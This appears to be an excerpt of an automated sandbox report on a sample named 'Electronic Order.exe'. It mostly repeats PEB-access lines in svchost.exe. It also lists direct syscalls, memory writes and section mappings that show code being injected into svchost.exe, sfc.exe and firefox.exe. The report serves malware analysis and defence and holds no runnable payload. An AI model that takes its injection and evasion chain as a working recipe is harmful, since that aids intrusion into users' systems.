            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B6420 mov eax, dword ptr fs:[00000030h]2_2_035B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035304E5 mov ecx, dword ptr fs:[00000030h]2_2_035304E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035EA49A mov eax, dword ptr fs:[00000030h]2_2_035EA49A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035644B0 mov ecx, dword ptr fs:[00000030h]2_2_035644B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035BA4B0 mov eax, dword ptr fs:[00000030h]2_2_035BA4B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035364AB mov eax, dword ptr fs:[00000030h]2_2_035364AB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03528B50 mov eax, dword ptr fs:[00000030h]2_2_03528B50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035DEB50 mov eax, dword ptr fs:[00000030h]2_2_035DEB50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035E4B4B mov eax, dword ptr fs:[00000030h]2_2_035E4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035E4B4B mov eax, dword ptr fs:[00000030h]2_2_035E4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035C6B40 mov eax, dword ptr fs:[00000030h]2_2_035C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035C6B40 mov eax, dword ptr fs:[00000030h]2_2_035C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035FAB40 mov eax, dword ptr fs:[00000030h]2_2_035FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035D8B42 mov eax, dword ptr fs:[00000030h]2_2_035D8B42
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0352CB7E mov eax, dword ptr fs:[00000030h]2_2_0352CB7E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03602B57 mov eax, dword ptr fs:[00000030h]2_2_03602B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03602B57 mov eax, dword ptr fs:[00000030h]2_2_03602B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03602B57 mov eax, dword ptr fs:[00000030h]2_2_03602B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03602B57 mov eax, dword ptr fs:[00000030h]2_2_03602B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035AEB1D mov eax, dword ptr fs:[00000030h]2_2_035AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035AEB1D mov eax, dword ptr fs:[00000030h]2_2_035AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035AEB1D mov eax, dword ptr fs:[00000030h]2_2_035AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035AEB1D mov eax, dword ptr fs:[00000030h]2_2_035AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035AEB1D mov eax, dword ptr fs:[00000030h]2_2_035AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035AEB1D mov eax, dword ptr fs:[00000030h]2_2_035AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035AEB1D mov eax, dword ptr fs:[00000030h]2_2_035AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035AEB1D mov eax, dword ptr fs:[00000030h]2_2_035AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035AEB1D mov eax, dword ptr fs:[00000030h]2_2_035AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03604B00 mov eax, dword ptr fs:[00000030h]2_2_03604B00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355EB20 mov eax, dword ptr fs:[00000030h]2_2_0355EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355EB20 mov eax, dword ptr fs:[00000030h]2_2_0355EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035F8B28 mov eax, dword ptr fs:[00000030h]2_2_035F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035F8B28 mov eax, dword ptr fs:[00000030h]2_2_035F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035DEBD0 mov eax, dword ptr fs:[00000030h]2_2_035DEBD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03550BCB mov eax, dword ptr fs:[00000030h]2_2_03550BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03550BCB mov eax, dword ptr fs:[00000030h]2_2_03550BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03550BCB mov eax, dword ptr fs:[00000030h]2_2_03550BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03530BCD mov eax, dword ptr fs:[00000030h]2_2_03530BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03530BCD mov eax, dword ptr fs:[00000030h]2_2_03530BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03530BCD mov eax, dword ptr fs:[00000030h]2_2_03530BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03538BF0 mov eax, dword ptr fs:[00000030h]2_2_03538BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03538BF0 mov eax, dword ptr fs:[00000030h]2_2_03538BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03538BF0 mov eax, dword ptr fs:[00000030h]2_2_03538BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355EBFC mov eax, dword ptr fs:[00000030h]2_2_0355EBFC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035BCBF0 mov eax, dword ptr fs:[00000030h]2_2_035BCBF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03540BBE mov eax, dword ptr fs:[00000030h]2_2_03540BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03540BBE mov eax, dword ptr fs:[00000030h]2_2_03540BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035E4BB0 mov eax, dword ptr fs:[00000030h]2_2_035E4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035E4BB0 mov eax, dword ptr fs:[00000030h]2_2_035E4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03536A50 mov eax, dword ptr fs:[00000030h]2_2_03536A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03536A50 mov eax, dword ptr fs:[00000030h]2_2_03536A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03536A50 mov eax, dword ptr fs:[00000030h]2_2_03536A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03536A50 mov eax, dword ptr fs:[00000030h]2_2_03536A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03536A50 mov eax, dword ptr fs:[00000030h]2_2_03536A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03536A50 mov eax, dword ptr fs:[00000030h]2_2_03536A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03536A50 mov eax, dword ptr fs:[00000030h]2_2_03536A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03540A5B mov eax, dword ptr fs:[00000030h]2_2_03540A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03540A5B mov eax, dword ptr fs:[00000030h]2_2_03540A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035ACA72 mov eax, dword ptr fs:[00000030h]2_2_035ACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035ACA72 mov eax, dword ptr fs:[00000030h]2_2_035ACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356CA6F mov eax, dword ptr fs:[00000030h]2_2_0356CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356CA6F mov eax, dword ptr fs:[00000030h]2_2_0356CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356CA6F mov eax, dword ptr fs:[00000030h]2_2_0356CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035DEA60 mov eax, dword ptr fs:[00000030h]2_2_035DEA60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035BCA11 mov eax, dword ptr fs:[00000030h]2_2_035BCA11
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03554A35 mov eax, dword ptr fs:[00000030h]2_2_03554A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03554A35 mov eax, dword ptr fs:[00000030h]2_2_03554A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356CA38 mov eax, dword ptr fs:[00000030h]2_2_0356CA38
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356CA24 mov eax, dword ptr fs:[00000030h]2_2_0356CA24
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355EA2E mov eax, dword ptr fs:[00000030h]2_2_0355EA2E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03530AD0 mov eax, dword ptr fs:[00000030h]2_2_03530AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03564AD0 mov eax, dword ptr fs:[00000030h]2_2_03564AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03564AD0 mov eax, dword ptr fs:[00000030h]2_2_03564AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03586ACC mov eax, dword ptr fs:[00000030h]2_2_03586ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03586ACC mov eax, dword ptr fs:[00000030h]2_2_03586ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03586ACC mov eax, dword ptr fs:[00000030h]2_2_03586ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356AAEE mov eax, dword ptr fs:[00000030h]2_2_0356AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356AAEE mov eax, dword ptr fs:[00000030h]2_2_0356AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03568A90 mov edx, dword ptr fs:[00000030h]2_2_03568A90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0353EA80 mov eax, dword ptr fs:[00000030h]2_2_0353EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0353EA80 mov eax, dword ptr fs:[00000030h]2_2_0353EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0353EA80 mov eax, dword ptr fs:[00000030h]2_2_0353EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0353EA80 mov eax, dword ptr fs:[00000030h]2_2_0353EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0353EA80 mov eax, dword ptr fs:[00000030h]2_2_0353EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0353EA80 mov eax, dword ptr fs:[00000030h]2_2_0353EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0353EA80 mov eax, dword ptr fs:[00000030h]2_2_0353EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0353EA80 mov eax, dword ptr fs:[00000030h]2_2_0353EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0353EA80 mov eax, dword ptr fs:[00000030h]2_2_0353EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03604A80 mov eax, dword ptr fs:[00000030h]2_2_03604A80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03538AA0 mov eax, dword ptr fs:[00000030h]2_2_03538AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03538AA0 mov eax, dword ptr fs:[00000030h]2_2_03538AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03586AA4 mov eax, dword ptr fs:[00000030h]2_2_03586AA4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B0946 mov eax, dword ptr fs:[00000030h]2_2_035B0946
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03604940 mov eax, dword ptr fs:[00000030h]2_2_03604940
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035D4978 mov eax, dword ptr fs:[00000030h]2_2_035D4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035D4978 mov eax, dword ptr fs:[00000030h]2_2_035D4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035BC97C mov eax, dword ptr fs:[00000030h]2_2_035BC97C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03556962 mov eax, dword ptr fs:[00000030h]2_2_03556962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03556962 mov eax, dword ptr fs:[00000030h]2_2_03556962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03556962 mov eax, dword ptr fs:[00000030h]2_2_03556962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0357096E mov eax, dword ptr fs:[00000030h]2_2_0357096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0357096E mov edx, dword ptr fs:[00000030h]2_2_0357096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0357096E mov eax, dword ptr fs:[00000030h]2_2_0357096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035BC912 mov eax, dword ptr fs:[00000030h]2_2_035BC912
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03528918 mov eax, dword ptr fs:[00000030h]2_2_03528918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03528918 mov eax, dword ptr fs:[00000030h]2_2_03528918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035AE908 mov eax, dword ptr fs:[00000030h]2_2_035AE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035AE908 mov eax, dword ptr fs:[00000030h]2_2_035AE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B892A mov eax, dword ptr fs:[00000030h]2_2_035B892A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035C892B mov eax, dword ptr fs:[00000030h]2_2_035C892B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0353A9D0 mov eax, dword ptr fs:[00000030h]2_2_0353A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0353A9D0 mov eax, dword ptr fs:[00000030h]2_2_0353A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0353A9D0 mov eax, dword ptr fs:[00000030h]2_2_0353A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0353A9D0 mov eax, dword ptr fs:[00000030h]2_2_0353A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0353A9D0 mov eax, dword ptr fs:[00000030h]2_2_0353A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0353A9D0 mov eax, dword ptr fs:[00000030h]2_2_0353A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035649D0 mov eax, dword ptr fs:[00000030h]2_2_035649D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035FA9D3 mov eax, dword ptr fs:[00000030h]2_2_035FA9D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035C69C0 mov eax, dword ptr fs:[00000030h]2_2_035C69C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035629F9 mov eax, dword ptr fs:[00000030h]2_2_035629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035629F9 mov eax, dword ptr fs:[00000030h]2_2_035629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035BE9E0 mov eax, dword ptr fs:[00000030h]2_2_035BE9E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B89B3 mov esi, dword ptr fs:[00000030h]2_2_035B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B89B3 mov eax, dword ptr fs:[00000030h]2_2_035B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B89B3 mov eax, dword ptr fs:[00000030h]2_2_035B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035429A0 mov eax, dword ptr fs:[00000030h]2_2_035429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035429A0 mov eax, dword ptr fs:[00000030h]2_2_035429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035429A0 mov eax, dword ptr fs:[00000030h]2_2_035429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035429A0 mov eax, dword ptr fs:[00000030h]2_2_035429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035429A0 mov eax, dword ptr fs:[00000030h]2_2_035429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035429A0 mov eax, dword ptr fs:[00000030h]2_2_035429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035429A0 mov eax, dword ptr fs:[00000030h]2_2_035429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035429A0 mov eax, dword ptr fs:[00000030h]2_2_035429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035429A0 mov eax, dword ptr fs:[00000030h]2_2_035429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035429A0 mov eax, dword ptr fs:[00000030h]2_2_035429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035429A0 mov eax, dword ptr fs:[00000030h]2_2_035429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035429A0 mov eax, dword ptr fs:[00000030h]2_2_035429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035429A0 mov eax, dword ptr fs:[00000030h]2_2_035429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035309AD mov eax, dword ptr fs:[00000030h]2_2_035309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035309AD mov eax, dword ptr fs:[00000030h]2_2_035309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03560854 mov eax, dword ptr fs:[00000030h]2_2_03560854
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03534859 mov eax, dword ptr fs:[00000030h]2_2_03534859
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03534859 mov eax, dword ptr fs:[00000030h]2_2_03534859
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03542840 mov ecx, dword ptr fs:[00000030h]2_2_03542840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035BE872 mov eax, dword ptr fs:[00000030h]2_2_035BE872
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035BE872 mov eax, dword ptr fs:[00000030h]2_2_035BE872
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035C6870 mov eax, dword ptr fs:[00000030h]2_2_035C6870
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035C6870 mov eax, dword ptr fs:[00000030h]2_2_035C6870
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035BC810 mov eax, dword ptr fs:[00000030h]2_2_035BC810
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03552835 mov eax, dword ptr fs:[00000030h]2_2_03552835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03552835 mov eax, dword ptr fs:[00000030h]2_2_03552835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03552835 mov eax, dword ptr fs:[00000030h]2_2_03552835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03552835 mov ecx, dword ptr fs:[00000030h]2_2_03552835
            Source: C:\Users\user\Desktop\Electronic Order.exeCode function: 0_2_00E181F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00E181F7
            Source: C:\Users\user\Desktop\Electronic Order.exeCode function: 0_2_00DEA395 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00DEA395
            Source: C:\Users\user\Desktop\Electronic Order.exeCode function: 0_2_00DEA364 SetUnhandledExceptionFilter,0_2_00DEA364

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exe NtResumeThread: Direct from: 0x773836AC
            Source: C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exe NtMapViewOfSection: Direct from: 0x77382D1C
            Source: C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exe NtWriteVirtualMemory: Direct from: 0x77382E3C
            Source: C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exe NtProtectVirtualMemory: Direct from: 0x77382F9C
            Source: C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exe NtSetInformationThread: Direct from: 0x773763F9
            Source: C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exe NtCreateMutant: Direct from: 0x773835CC
            Source: C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exe NtNotifyChangeKey: Direct from: 0x77383C2C
            Source: C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exe NtSetInformationProcess: Direct from: 0x77382C5C
            Source: C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exe NtCreateUserProcess: Direct from: 0x7738371C
            Source: C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exe NtQueryInformationProcess: Direct from: 0x77382C26
            Source: C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exe NtResumeThread: Direct from: 0x77382FBC
            Source: C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exe NtWriteVirtualMemory: Direct from: 0x7738490C
            Source: C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exe NtAllocateVirtualMemory: Direct from: 0x77383C9C
            Source: C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exe NtReadFile: Direct from: 0x77382ADC
            Source: C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exe NtAllocateVirtualMemory: Direct from: 0x77382BFC
            Source: C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exe NtDelayExecution: Direct from: 0x77382DDC
            Source: C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exe NtQuerySystemInformation: Direct from: 0x77382DFC
            Source: C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exe NtOpenSection: Direct from: 0x77382E0C
            Source: C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exe NtQueryVolumeInformationFile: Direct from: 0x77382F2C
            Source: C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exe NtQuerySystemInformation: Direct from: 0x773848CC
            Source: C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exe NtReadVirtualMemory: Direct from: 0x77382E8C
            Source: C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exe NtCreateKey: Direct from: 0x77382C6C
            Source: C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exe NtClose: Direct from: 0x77382B6C
            Source: C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exe NtAllocateVirtualMemory: Direct from: 0x773848EC
            Source: C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exe NtQueryAttributesFile: Direct from: 0x77382E6C
            Source: C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exe NtSetInformationThread: Direct from: 0x77382B4C
            Source: C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exe NtTerminateThread: Direct from: 0x77382FCC
            Source: C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exe NtQueryInformationToken: Direct from: 0x77382CAC
            Source: C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exe NtOpenKeyEx: Direct from: 0x77382B9C
            Source: C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exe NtAllocateVirtualMemory: Direct from: 0x77382BEC
            Source: C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exe NtDeviceIoControlFile: Direct from: 0x77382AEC
            Source: C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exe NtCreateFile: Direct from: 0x77382FEC
            Source: C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exe NtOpenFile: Direct from: 0x77382DCC
            Source: C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exe NtProtectVirtualMemory: Direct from: 0x77377B2E
            Source: C:\Users\user\Desktop\Electronic Order.exe Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\svchost.exe Section loaded: NULL target: C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\svchost.exe Section loaded: NULL target: C:\Windows\SysWOW64\sfc.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\sfc.exe Section loaded: NULL target: C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exe protection: read write
            Source: C:\Windows\SysWOW64\sfc.exe Section loaded: NULL target: C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\sfc.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
            Source: C:\Windows\SysWOW64\sfc.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\sfc.exe Thread register set: target process: 2020
            Source: C:\Windows\SysWOW64\sfc.exe Thread APC queued: target process: C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exe
            Source: C:\Users\user\Desktop\Electronic Order.exe Memory written: C:\Windows\SysWOW64\svchost.exe base: 2BFE008
            Source: C:\Users\user\Desktop\Electronic Order.exeCode function: 0_2_00E18C93 LogonUserW,0_2_00E18C93
